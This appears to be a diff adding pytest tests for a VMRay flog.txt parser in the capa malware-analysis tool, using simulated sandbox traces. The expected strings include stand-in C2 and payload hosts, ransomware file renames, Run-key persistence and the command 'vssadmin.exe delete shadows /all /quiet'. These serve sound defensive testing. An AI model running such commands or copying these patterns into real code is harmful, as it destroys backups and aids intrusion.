path = tmp_path / "flog.txt" + path.write_bytes( + b"# Flog Txt Version 1\n\n" + b'Process:\nid = "1"\nos_pid = "0x1000"\nparent_id = "0"\nos_parent_pid = "0"\n' + b'image_name = "sample"\nfilename = "x.exe"\ncmd_line = ""\nmonitor_reason = "a"\n\n' + b'Thread:\nid = "1"\nos_tid = "0x2000"\n' + b' [0001.000] CreateFile (lpFileName="test.exe", dwDesiredAccess=0x80000000) returned 0x4\n' + b" [0002.000] VirtualAlloc (lpAddress=0x0, dwSize=4096) returned 0x10000\n" + b" [0003.000] GetCurrentProcess () returned 0xffffffffffffffff\n" + ) + flog = flog_txt.parse_flog_txt_path(path) + calls = flog.analysis.function_calls + + # CreateFile: string param and numeric param + create_file = calls[0] + assert create_file.name == "CreateFile" + assert create_file.params_in is not None + params = {p.name: p for p in create_file.params_in.params} + assert "lpFileName" in params + assert params["lpFileName"].deref is not None + assert params["lpFileName"].deref.value == "test.exe" + assert "dwDesiredAccess" in params + assert params["dwDesiredAccess"].value == "0x80000000" + + # VirtualAlloc: two numeric params + virtual_alloc = calls[1] + assert virtual_alloc.params_in is not None + va_params = {p.name: p for p in virtual_alloc.params_in.params} + assert va_params["lpAddress"].value == "0x0" + assert va_params["dwSize"].value == "4096" + + # no-arg call: params_in should be None + get_proc = calls[2] + assert get_proc.name == "GetCurrentProcess" + assert get_proc.params_in is None + + +# --------------------------------------------------------------------------- +# Fixture-based feature-presence tests +# --------------------------------------------------------------------------- +# These tests load the realistic flog.txt fixtures from tests/fixtures/vmray/flog_txt/ +# and verify that the extractor yields the expected capa features. They act as +# regression tests for the parser — especially the string-argument parsing path, +# which is brittle — and mirror the pattern used by test_vmray_features.py. + + +def _collect_all_call_features(ext: VMRayExtractor) -> set: + """Collect every feature emitted at the call scope across all processes.""" + features = set() + for ph in ext.get_processes(): + for th in ext.get_threads(ph): + for ch in ext.get_calls(ph, th): + for feature, addr in ext.extract_call_features(ph, th, ch): + features.add(feature) + return features + + +def _collect_call_features_for_process(ext: VMRayExtractor, image_name: str) -> set: + """Collect call-scope features only for the process whose image_name matches.""" + features = set() + for ph in ext.get_processes(): + if ph.inner.image_name != image_name: + continue + for th in ext.get_threads(ph): + for ch in ext.get_calls(ph, th): + for feature, addr in ext.extract_call_features(ph, th, ch): + features.add(feature) + return features + + +# --- windows_apis.flog.txt --------------------------------------------------- + + +@pytest.fixture(scope="module") +def windows_apis_extractor(): + path = FLOG_TXT_FIXTURES / "windows_apis.flog.txt" + return VMRayExtractor.from_flog_txt(path) + + +def test_windows_flog_txt_process_count(windows_apis_extractor): + """Two processes are described in windows_apis.flog.txt.""" + procs = list(windows_apis_extractor.get_processes()) + assert len(procs) == 2 + + +def test_windows_flog_txt_api_features(windows_apis_extractor): + """Common Win32 API names are yielded as API features.""" + features = _collect_all_call_features(windows_apis_extractor) + for api_name in ( + "CreateFileW", + "RegOpenKeyExW", + "InternetOpenW", + "InternetConnectW", + "VirtualAlloc", + "CreateMutexW", + "LoadLibraryW", + "CreateProcessW", + "HttpOpenRequestW", + "WinHttpConnect", + "GetAddrInfoW", + "GetComputerNameW", + ): + assert capa.features.insn.API(api_name) in features, f"API({api_name!r}) not found" + + +def test_windows_flog_txt_string_args(windows_apis_extractor): + """String arguments are extracted and backslash-escaping is correctly unwound.""" + features = _collect_all_call_features(windows_apis_extractor) + for expected_string in ( + # CreateFileW lpFileName (double-backslash in flog → single backslash in feature) + "C:\\Users\\test\\Documents\\config.ini", + # RegOpenKeyExW lpSubKey + "Software\\Microsoft\\Windows\\CurrentVersion\\Run", + # InternetOpenW lpszAgent + "Mozilla/5.0 (Windows NT 10.0)", + # InternetConnectW lpszServerName + "evil.example.com", + # CreateMutexW lpName + "Global\\MyMutex12345", + # LoadLibraryW lpLibFileName + "kernel32.dll", + # HttpOpenRequestW verb and path + "GET", + "/beacon", + # WinHttpConnect pswzServerName + "c2.example.org", + # WinHttpOpenRequest verb + "POST", + # GetComputerNameW result (child process) + "DESKTOP-TEST01", + ): + assert capa.features.common.String(expected_string) in features, f"String({expected_string!r}) not found" + + +def test_windows_flog_txt_string_double_backslash_absent(windows_apis_extractor): + """Double-escaped backslashes (as they appear in the raw flog.txt) must NOT appear in features.""" + features = _collect_all_call_features(windows_apis_extractor) + # The raw flog.txt content has C:\\Users\\...; the extractor must normalise to single backslash + assert capa.features.common.String("C:\\\\Users\\\\test\\\\Documents\\\\config.ini") not in features + + +def test_windows_flog_txt_number_args(windows_apis_extractor): + """Numeric arguments are extracted as Number features.""" + features = _collect_all_call_features(windows_apis_extractor) + # VirtualAlloc dwSize + assert capa.features.insn.Number(4096) in features + # VirtualAlloc flAllocationType + assert capa.features.insn.Number(0x3000) in features + # VirtualAlloc flProtect + assert capa.features.insn.Number(0x40) in features + # CreateFileW dwDesiredAccess + assert capa.features.insn.Number(0x80000000) in features + + +def test_windows_flog_txt_child_process(windows_apis_extractor): + """The spawned child process (cmd.exe) is present and has its own API calls.""" + features = _collect_call_features_for_process(windows_apis_extractor, "cmd.exe") + assert capa.features.insn.API("NtQueryInformationProcess") in features + assert capa.features.insn.API("GetUserNameW") in features + # GetUserNameW lpBuffer string + assert capa.features.common.String("test") in features + + +# --- linux_syscalls.flog.txt ------------------------------------------------- + + +@pytest.fixture(scope="module") +def linux_syscalls_extractor(): + path = FLOG_TXT_FIXTURES / "linux_syscalls.flog.txt" + return VMRayExtractor.from_flog_txt(path) + + +def test_linux_flog_txt_sys_prefix_stripped(linux_syscalls_extractor): + """sys_ prefix is stripped from all Linux syscall names.""" + features = _collect_all_call_features(linux_syscalls_extractor) + # Every syscall name should appear WITHOUT the sys_ prefix + for stripped_name in ( + "read", + "write", + "open", + "connect", + "socket", + "execve", + "fork", + "getuid", + "setuid", + "chmod", + "unlink", + "time", + "ptrace", + "prctl", + "mmap", + "mprotect", + "munmap", + "bind", + "listen", + "accept", + "sendto", + "recvfrom", + ): + assert capa.features.insn.API(stripped_name) in features, f"API({stripped_name!r}) not found after stripping" + + +def test_linux_flog_txt_sys_prefix_not_present(linux_syscalls_extractor): + """sys_-prefixed names must NOT appear in features (only the stripped form).""" + features = _collect_all_call_features(linux_syscalls_extractor) + assert capa.features.insn.API("sys_open") not in features + assert capa.features.insn.API("sys_execve") not in features + + +def test_linux_flog_txt_string_args(linux_syscalls_extractor): + """String path arguments from Linux syscalls are extracted correctly.""" + features = _collect_all_call_features(linux_syscalls_extractor) + assert capa.features.common.String("/etc/passwd") in features + assert capa.features.common.String("/bin/sh") in features + assert capa.features.common.String("/tmp/backdoor") in features + assert capa.features.common.String("/tmp/.hidden") in features + + +# --- string_edge_cases.flog.txt ----------------------------------------------- + + +@pytest.fixture(scope="module") +def string_edge_cases_extractor(): + path = FLOG_TXT_FIXTURES / "string_edge_cases.flog.txt" + return VMRayExtractor.from_flog_txt(path) + + +def test_edge_case_paths_with_spaces(string_edge_cases_extractor): + """File paths containing spaces are parsed correctly.""" + features = _collect_all_call_features(string_edge_cases_extractor) + assert capa.features.common.String("C:\\path with spaces\\file name.txt") in features + + +def test_edge_case_unc_path(string_edge_cases_extractor): + """UNC paths (\\server\\share) are parsed correctly.""" + features = _collect_all_call_features(string_edge_cases_extractor) + assert capa.features.common.String("\\\\server\\share\\document.docx") in features + + +def test_edge_case_url_string(string_edge_cases_extractor): + """Full URL strings are preserved as-is.""" + features = _collect_all_call_features(string_edge_cases_extractor) + assert capa.features.common.String("https://c2.example.com/payload.bin") in features + + +def test_edge_case_registry_key(string_edge_cases_extractor): + """Registry key paths are normalised to single backslashes.""" + features = _collect_all_call_features(string_edge_cases_extractor) + assert capa.features.common.String("Software\\Microsoft\\Windows NT\\CurrentVersion") in features + + +def test_edge_case_numeric_args(string_edge_cases_extractor): + """Numeric arguments from edge-case calls are extracted.""" + features = _collect_all_call_features(string_edge_cases_extractor) + # send() len=256 + assert capa.features.insn.Number(256) in features + # recv() len=4096 + assert capa.features.insn.Number(4096) in features + # WriteProcessMemory nSize=4096 + assert capa.features.insn.Number(4096) in features + + +# --------------------------------------------------------------------------- +# _parse_hex_or_decimal parametric tests +# --------------------------------------------------------------------------- + + +@pytest.mark.parametrize( + "raw, expected", + [ + ("0", 0), + ("1", 1), + ("255", 255), + ("4294967295", 4294967295), + ("0x0", 0), + ("0xff", 255), + ("0xFF", 255), + ("0xDEADbeef", 0xDEADBEEF), + ("0xffffffffffffffff", 0xFFFFFFFFFFFFFFFF), + ("0x80070005", 0x80070005), + # leading/trailing whitespace is stripped + (" 0x10 ", 0x10), + # quoted values are unquoted before parsing + ('"0x20"', 0x20), + # empty string → 0 + ("", 0), + # negative decimal (Python int() accepts it) + ("-1", -1), + ], +) +def test_parse_hex_or_decimal_valid(raw, expected): + assert _parse_hex_or_decimal(raw) == expected + + +@pytest.mark.parametrize("raw", ["NULL", "TRUE", "FALSE", "INVALID_HANDLE_VALUE", "abc"]) +def test_parse_hex_or_decimal_invalid_raises(raw): + with pytest.raises((ValueError, TypeError)): + _parse_hex_or_decimal(raw) + + +# --------------------------------------------------------------------------- +# _parse_event parametric tests +# --------------------------------------------------------------------------- + + +@pytest.mark.parametrize( + "line, expected_api, expected_rv", + [ + # basic no-arg call with hex return value + ("[0072.750] GetCurrentProcess () returned 0xffffffffffffffff", "GetCurrentProcess", 0xFFFFFFFFFFFFFFFF), + # uppercase hex return value (mixed case) + ("[0001.000] GetCurrentProcess () returned 0xFFFFFFFF", "GetCurrentProcess", 0xFFFFFFFF), + # HRESULT-style error code + ("[0001.010] DeleteFileW () returned 0x80070005", "DeleteFileW", 0x80070005), + # no return value at all (line ends after closing paren) + ("[0083.567] CoTaskMemFree (pv=0x746aa0)", "CoTaskMemFree", None), + # decimal return value + ("[0001.003] ExitProcess (uExitCode=0) returned 0", "ExitProcess", 0), + # leading zeros in timestamp major/minor + ("[0001.000] NtCreateFile () returned 0x0", "NtCreateFile", 0), + # large timestamp + ("[9999.999] LongRunningOp () returned 0x1", "LongRunningOp", 1), + ], +) +def test_parse_event_valid(line, expected_api, expected_rv): + result = _parse_event(line) + assert result is not None + api_name, _args, rv = result + assert api_name == expected_api + assert rv == expected_rv + + +@pytest.mark.parametrize( + "line", + [ + # does not start with '[' + "GetCurrentProcess () returned 0x1", + # comment / header line + "# Flog Txt Version 1", + # blank line + "", + # property line (key = value) + 'id = "1"', + # bracket never closed + "[0001.000 GetCurrentProcess () returned 0x1", + # section header + "Process:", + "Thread:", + "Region:", + ], +) +def test_parse_event_rejects_non_event_lines(line): + assert _parse_event(line) is None + + +# --------------------------------------------------------------------------- +# _parse_args parametric tests +# --------------------------------------------------------------------------- + + +@pytest.mark.parametrize( + "args_str, expected_names", + [ + # empty / whitespace-only → None + ("", None), + (" ", None), + # only symbolic constants (NULL, TRUE) → no parseable params → None + ("lpszProxyName=NULL, lpszProxyBypass=NULL", None), + # string arg only + ('lpszAgent="WinInet"', ["lpszAgent"]), + # numeric hex arg + ("dwDesiredAccess=0x80000000", ["dwDesiredAccess"]), + # numeric decimal arg + ("dwLen=16", ["dwLen"]), + # mixed: string + hex + decimal + symbolic (symbolic skipped) + ('lpFileName="test.exe", dwAccess=0x80000000, count=4096, hTemplate=NULL', ["lpFileName", "dwAccess", "count"]), + # mixed-case hex is accepted + ("addr=0xDEADbeef", ["addr"]), + ], +) +def test_parse_args_param_names(args_str, expected_names): + result = _parse_args(args_str) + if expected_names is None: + assert result is None + else: + assert result is not None + names = [p.name for p in result.params] + assert names == expected_names + + +def test_parse_args_string_value_stored_in_deref(): + result = _parse_args('lpFileName="hello.txt"') + assert result is not None + assert len(result.params) == 1 + p = result.params[0] + assert p.type_ == "void_ptr" + assert p.deref is not None + assert p.deref.type_ == "str" + assert p.deref.value == "hello.txt" + + +def test_parse_args_numeric_type(): + result = _parse_args("dwSize=4096, hKey=0x80000001") + assert result is not None + names = {p.name: p for p in result.params} + assert names["dwSize"].type_ == "unsigned_32bit" + assert names["dwSize"].value == "4096" + assert names["hKey"].type_ == "unsigned_32bit" + assert names["hKey"].value == "0x80000001" + + +# --------------------------------------------------------------------------- +# Malformed-input resilience tests +# --------------------------------------------------------------------------- + + +_HEADER = b"# Flog Txt Version 1\n\n" +_PROCESS_HEADER = ( + b"Process:\n" + b'id = "1"\n' + b'os_pid = "0x1000"\n' + b'parent_id = "0"\n' + b'os_parent_pid = "0"\n' + b'image_name = "sample.exe"\n' + b'filename = "sample.exe"\n' + b'cmd_line = ""\n' + b'monitor_reason = "analysis_target"\n\n' +) +_THREAD_HEADER = b'Thread:\nid = "1"\nos_tid = "0x2000"\n' + + +@pytest.mark.parametrize( + "extra_lines", + [ + # completely garbled event lines are silently skipped + b"not a valid event line\n", + b"[broken bracket\n", + b"[0001.000 missing closing bracket] Func () returned 0x1\n", + # comment inside thread block is skipped + b"# stray comment\n [0001.000] GetCurrentProcess () returned 0x1\n", + # blank lines inside thread block + b"\n\n [0001.000] GetCurrentProcess () returned 0x1\n", + ], +) +def test_malformed_event_lines_do_not_crash(tmp_path, extra_lines): + path = tmp_path / "flog.txt" + path.write_bytes(_HEADER + _PROCESS_HEADER + _THREAD_HEADER + extra_lines) + flog = flog_txt.parse_flog_txt_path(path) + assert flog.analysis.log_version == "1" + + +def test_process_block_without_thread_is_skipped(tmp_path): + path = tmp_path / "flog.txt" + path.write_bytes(_HEADER + b"Process:\n" + b'id = "1"\nos_pid = "0x1000"\nimage_name = "x.exe"\n') + flog = flog_txt.parse_flog_txt_path(path) + assert len(flog.analysis.monitor_processes) == 0 + + +def test_bom_prefix_is_accepted(tmp_path): + path = tmp_path / "flog.txt" + path.write_bytes(b"\xef\xbb\xbf" + _HEADER + _PROCESS_HEADER + _THREAD_HEADER) + flog = flog_txt.parse_flog_txt_path(path) + assert len(flog.analysis.monitor_processes) == 1 + + +# --------------------------------------------------------------------------- +# format_variance.flog.txt — real-world format diversity fixture +# --------------------------------------------------------------------------- +# This fixture exercises: zero-padded hex IDs, decimal-only arguments alongside +# symbolic constants, mixed-case hex return values, multiple threads in one +# process, HRESULT-style error codes as return values, and no-return-value calls. + + +@pytest.fixture(scope="module") +def format_variance_extractor(): + path = FLOG_TXT_FIXTURES / "format_variance.flog.txt" + return VMRayExtractor.from_flog_txt(path) + + +def test_format_variance_process_and_thread_count(format_variance_extractor): + procs = list(format_variance_extractor.get_processes()) + assert len(procs) == 2 + thread_counts = [len(list(format_variance_extractor.get_threads(p))) for p in procs] + # first process has two threads, second has one + assert sorted(thread_counts) == [1, 2] + + +def test_format_variance_leading_zero_pid_parsed(format_variance_extractor): + procs = list(format_variance_extractor.get_processes()) + pids = {p.inner.pid for p in procs} + # os_pid = "0x00000ABC" → 0xABC = 2748 + assert 0xABC in pids + + +def test_format_variance_api_features(format_variance_extractor): + features = _collect_all_call_features(format_variance_extractor) + for api_name in ( + "CreateFileW", + "ReadFile", + "WriteFile", + "MoveFileExW", + "RegOpenKeyExW", + "RegSetValueExW", + "CryptAcquireContextW", + "CryptGenRandom", + "CryptEncrypt", + "InternetOpenW", + "InternetOpenUrlW", + "CreateProcessW", + "FindFirstFileW", + "FindNextFileW", + "NtQuerySystemInformation", + "OpenProcess", + "CloseHandle", + "WaitForSingleObject", + "ExitProcess", + ): + assert capa.features.insn.API(api_name) in features, f"API({api_name!r}) not found" + + +def test_format_variance_string_args(format_variance_extractor): + features = _collect_all_call_features(format_variance_extractor) + for expected in ( + "C:\\Users\\victim\\Documents\\important.docx", + "C:\\Users\\victim\\Documents\\important.docx.locked", + "C:\\Users\\victim\\Documents\\spreadsheet.xlsx", + "C:\\Users\\victim\\Documents\\spreadsheet.xlsx.locked", + "C:\\Users\\victim\\README_DECRYPT.txt", + "Software\\Microsoft\\Windows\\CurrentVersion\\Run", + "WindowsDefender", + "C:\\Users\\victim\\Desktop\\ransomware.exe", + "Mozilla/4.0 (compatible; MSIE 8.0)", + "http://ransom.example.com/key?id=ABCDEF0123456789", + "vssadmin.exe delete shadows /all /quiet", + ): + assert capa.features.common.String(expected) in features, f"String({expected!r}) not found" + + +def test_format_variance_decimal_only_numeric_args(format_variance_extractor): + features = _collect_all_call_features(format_variance_extractor) + # RegOpenKeyExW: hKey=2147483650 (decimal), ulOptions=0, samDesired=131097 (decimal) + assert capa.features.insn.Number(2147483650) in features + assert capa.features.insn.Number(131097) in features + # CryptAcquireContextW: dwProvType=24 (decimal) + assert capa.features.insn.Number(24) in features + # WaitForSingleObject: dwMilliseconds=4294967295 (decimal INFINITE) + assert capa.features.insn.Number(4294967295) in features + + +def test_format_variance_mixed_case_hex_args(format_variance_extractor): + features = _collect_all_call_features(format_variance_extractor) + # CryptAcquireContextW dwFlags=0xF0000000 (uppercase hex digits in fixture) + assert capa.features.insn.Number(0xF0000000) in features + + +def test_format_variance_no_returnvalue_calls_parsed(format_variance_extractor): + features = _collect_all_call_features(format_variance_extractor) + # CoTaskMemFree and GetSystemInfo have no "returned" clause in the fixture + assert capa.features.insn.API("CoTaskMemFree") in features + assert capa.features.insn.API("GetSystemInfo") in features + + +def test_format_variance_child_process_present(format_variance_extractor): + features = _collect_call_features_for_process(format_variance_extractor, "vssadmin.exe") + assert capa.features.insn.API("NtQuerySystemInformation") in features + assert capa.features.insn.API("OpenProcess") in features + + +# --------------------------------------------------------------------------- +# crlf_endings.flog.txt — Windows CRLF line endings +# --------------------------------------------------------------------------- + + +@pytest.fixture(scope="module") +def crlf_extractor(): + path = FLOG_TXT_FIXTURES / "crlf_endings.flog.txt" + return VMRayExtractor.from_flog_txt(path) + + +def test_crlf_process_parsed(crlf_extractor): + procs = list(crlf_extractor.get_processes()) + assert len(procs) == 1 + assert procs[0].inner.image_name == "downloader.exe" + + +def test_crlf_api_features(crlf_extractor): + features = _collect_all_call_features(crlf_extractor) + for api_name in ( + "InternetOpenA", + "InternetConnectA", + "HttpOpenRequestA", + "HttpSendRequestA", + "InternetReadFile", + "CreateFileA", + "WriteFile", + "WinExec", + ): + assert capa.features.insn.API(api_name) in features, f"API({api_name!r}) not found" + + +def test_crlf_string_args(crlf_extractor): + features = _collect_all_call_features(crlf_extractor) + assert capa.features.common.String("WinInet") in features + assert capa.features.common.String("payload.example.com") in features + assert capa.features.common.String("GET") in features + assert capa.features.common.String("/stage2.bin") in features + assert capa.features.common.String("C:\\Windows\\Temp\\svchost32.exe") in features + + +# --------------------------------------------------------------------------- +# Round-trip test: parse → extract features → verify counts and spot-checks +# --------------------------------------------------------------------------- + + +def test_round_trip_feature_count(tmp_path): + path = tmp_path / "flog.txt" + path.write_bytes( + b"# Flog Txt Version 1\n\n" + b"Process:\n" + b'id = "1"\nos_pid = "0x1000"\nparent_id = "0"\nos_parent_pid = "0"\n' + b'image_name = "sample.exe"\nfilename = "sample.exe"\ncmd_line = ""\n' + b'monitor_reason = "analysis_target"\n\n' + b"Thread:\n" + b'id = "1"\nos_tid = "0x2000"\n' + b' [0001.000] CreateFileW (lpFileName="secret.txt", dwDesiredAccess=0x80000000) returned 0x4\n' + b" [0001.001] ReadFile (hFile=0x4, lpBuffer=0x5000, nNumberOfBytesToRead=512) returned 0x1\n" + b" [0001.002] CloseHandle (hObject=0x4) returned 0x1\n" + b" [0001.003] GetCurrentProcess () returned 0xffffffffffffffff\n" + ) + ext = VMRayExtractor.from_flog_txt(path) + procs = list(ext.get_processes()) + assert len(procs) == 1 + + threads = list(ext.get_threads(procs[0])) + assert len(threads) == 1 + + calls = list(ext.get_calls(procs[0], threads[0])) + assert len(calls) == 4 + + features = _collect_all_call_features(ext) + + # spot-check: API names + assert capa.features.insn.API("CreateFileW") in features + assert capa.features.insn.API("ReadFile") in features + assert capa.features.insn.API("CloseHandle") in features + assert capa.features.insn.API("GetCurrentProcess") in features + + # spot-check: string arg from CreateFileW + assert capa.features.common.String("secret.txt") in features + + # spot-check: numeric args + assert capa.features.insn.Number(0x80000000) in features + assert capa.features.insn.Number(512) in features